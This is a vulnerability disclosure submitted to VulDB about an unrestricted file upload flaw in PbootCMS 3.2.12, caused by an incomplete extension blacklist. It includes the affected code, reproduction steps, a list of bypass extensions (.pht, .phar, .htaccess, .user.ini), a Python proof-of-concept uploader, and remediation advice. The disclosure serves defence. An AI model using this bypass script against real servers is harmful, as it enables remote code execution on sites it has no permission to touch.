| Título | 翱云科技 PbootCMS 3.2.12 Incomplete Identification of Uploaded File Variables |
|---|
| Descrição | Title
PbootCMS 3.2.12 Dangerous File Upload Due to Incomplete Extension Blacklist
Product
PbootCMS
Affected Version
3.2.12
Vulnerability Type
CWE-434: Unrestricted Upload of File with Dangerous Type
Severity
High
Suggested CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Base Score: 8.8
Overview
The upload validation logic relies on an incomplete blacklist and omits dangerous extensions such as .pht, .phar, .php7, .cgi, .htaccess, and .user.ini. In compatible server environments, an authenticated attacker may upload executable content or files that alter runtime behavior.
Audit Methodology
The issue was identified through static review of upload validation logic and confirmed by analyzing the proof-of-concept upload workflow.
Audit Workflow
Reviewed upload validation logic in core/function/file.php.
Extracted the blacklist used for dangerous extension filtering.
Compared the blacklist against known dangerous script and configuration extensions.
Identified omitted extensions that may still be interpreted by common server configurations.
Verified the upload path and runtime test strategy through the existing PoC script.
Affected Code Location
File: core/function/file.php
$black = array(
'php', 'jsp', 'asp', 'vb', 'exe', 'sh', 'cmd',
'bat', 'vbs', 'phtml', 'class',
'php2', 'php3', 'php4', 'php5'
);
Root Cause
The application uses a blacklist instead of a strict allowlist. Blacklists are brittle and fail to account for alternate executable extensions and server-specific parsing behavior.
Reproduction Steps
Authenticate as a user who can access /member/upload.
Upload a file with an omitted dangerous extension such as .pht.
If the server environment maps that extension to executable code, request the uploaded file directly.
Embedded PoC Script
Source: security_poc/poc_upload_bypass.py
import requests
import io
BYPASS_EXTENSIONS = [
("pht", "Apache default PHP-mapped extension in some environments"),
("phar", "PHP archive file"),
("php7", "Alternate PHP extension"),
("phps", "PHP source extension in some setups"),
("shtml", "SSI server-side include"),
("cgi", "CGI script"),
("htaccess", "Apache override configuration file"),
("user.ini", "PHP per-directory configuration file"),
]
def test_upload_bypass(base_url, session, cookie=None):
upload_url = base_url.rstrip("/") + "/member/upload"
if cookie:
session.headers["Cookie"] = cookie
test_content = b"<?php echo 'PBOOTCMS_UPLOAD_TEST'; ?>"
for ext, desc in BYPASS_EXTENSIONS:
filename = f"test_poc.{ext}"
files = {
"upload": (filename, io.BytesIO(test_content), "application/octet-stream")
}
resp = session.post(upload_url, files=files, timeout=10)
print(filename, resp.status_code, resp.text[:200])
session = requests.Session()
test_upload_bypass("http://localhost:8888", session)
Impact
Remote code execution in susceptible deployments
Upload of attacker-controlled files into web-accessible directories
Potential server behavior manipulation through .htaccess or .user.ini
Remediation
Replace the blacklist with a strict allowlist of permitted file types
Store uploads outside the web root
Disable script execution in upload directories |
|---|
| Fonte | ⚠️ https://github.com/zzj-create/cvetest/blob/main/VULN-04_DANGEROUS_FILE_UPLOAD_REPORT_EN.md |
|---|
| Utilizador | zmjjkk (UID 96182) |
|---|
| Submissão | 06/03/2026 12h41 (há 3 meses) |
|---|
| Moderação | 20/03/2026 15h26 (14 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 352075 [PbootCMS até 3.2.12 File Upload core/function/file.php black Elevação de Privilégios] |
|---|
| Pontos | 20 |
|---|